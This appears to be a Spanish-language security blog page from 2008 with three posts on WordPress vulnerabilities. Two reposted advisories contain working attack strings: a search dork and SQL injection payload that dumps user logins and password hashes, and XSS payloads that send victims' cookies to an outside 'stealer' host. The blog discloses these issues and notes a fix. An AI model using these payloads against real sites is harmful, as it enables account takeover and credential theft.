Inyección Sql en el Login de Wordpress 2.5 ?

Un Rumor que encuentro en BlogSecurity, Según ellos, ayer recibieron un Meil, el cual Indicaba que en el Login de administración de Wordpress 2.5 podría producirse una vulnerabilidad de Inyección Sql.

Wordpress Security

Aunque no han recibido más información. Dijeron que hiban a investigar un poco mas la situación y dar a conocer si era un Bug o una Broma, mientras tanto yo sigo esperando para actualizar.

April 7, 2008 · Archivado en Vulnerabilidades

1 Comentario 

Vulnerabilidad afecta un Plugin de Wordpress

Recien me encuentro con una vulnerabilidad en un Plugin de Wordpress y considero importante por el echo que es de uso bastante masivo ya que lo he visto por varios Lados, consiste en una Inyección Sql en el Plugin “Wp-Download“, aunque no se informó la Url del Autor, supongo que es esta.

Algun Kaker Atacante, puede Explotar la vulnerabilidad Facilmente.

Aca el Informe:

###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:“wp-download.php?dl_id=”
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0×3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# milw0rm.com [2008-03-31]


Actualización:


El autor del Plugin ya Liberó una Nueva Versión que arregla el Bug de la Inyeccion Sql.

				
		
		
			

				

					
March 31, 2008 · Archivado en Vulnerabilidades

				

				

					
4 Comentarios 

				

			

			
			

		
				
		
Blogs de Wordpress.Com Vulnerables a Xss

		
Parece que todos los blogs de Wordpress.COM Son vulnerables a Xss, debido al archivo Invite.php y Users.php que Permite ejecutar Código que podría ser malicioso…Para que se entienda mejor Pueden Ver el Video que se ve claramente la demostración de la Vulnerabilidad, también han Publicado el Full Disclosure que es el Siguiente:


Hackers Center Security Group (http://www.hackerscenter.com)


Credit: DoZ Class: Input Validation Error


Remote: Yes


Product: WordPress


Version: 2.3.2


Vendor: http://www.WordPress.com


Attackers can exploit these issues via a web client.


Url: (1 & 2)


1. Our Testing Example:


http://site.wordpress.com/wp-admin/users.php?update=invite&inviteemail=Attack_Code


Example of Attack String: “>< iframe src=http://members.lycos.co.uk/Account/CookieMonster.php width=0 height=0>


< /script>


2. Our Testing Example: (Works If Admin is already logged in)


http://site.wordpress.com/wp-admin/invites.php?result=sent&to=%22%3E%3Cscript%3Ealert


(document.cookie);%3C/script%3E


Example of Attack String:


< script>document.location=”http://www.mysite/stealer.php?cookie=


” + document.cookie;< /script>


Aclaro Nuevamente para que no alla confusiones de gusto, SOLO Los Blogs alojados en Wordpress.COM son Vulnerables, los que se Instalan y son descargados de Wordpress.org NO son Vulnerables.


Vía | Hackerscenter


También en su Blog, DragóN habló de la Noticia

				
		
		
			

				

					
March 10, 2008 · Archivado en Vulnerabilidades,  WordPress

				

				

					
Ningun Comentario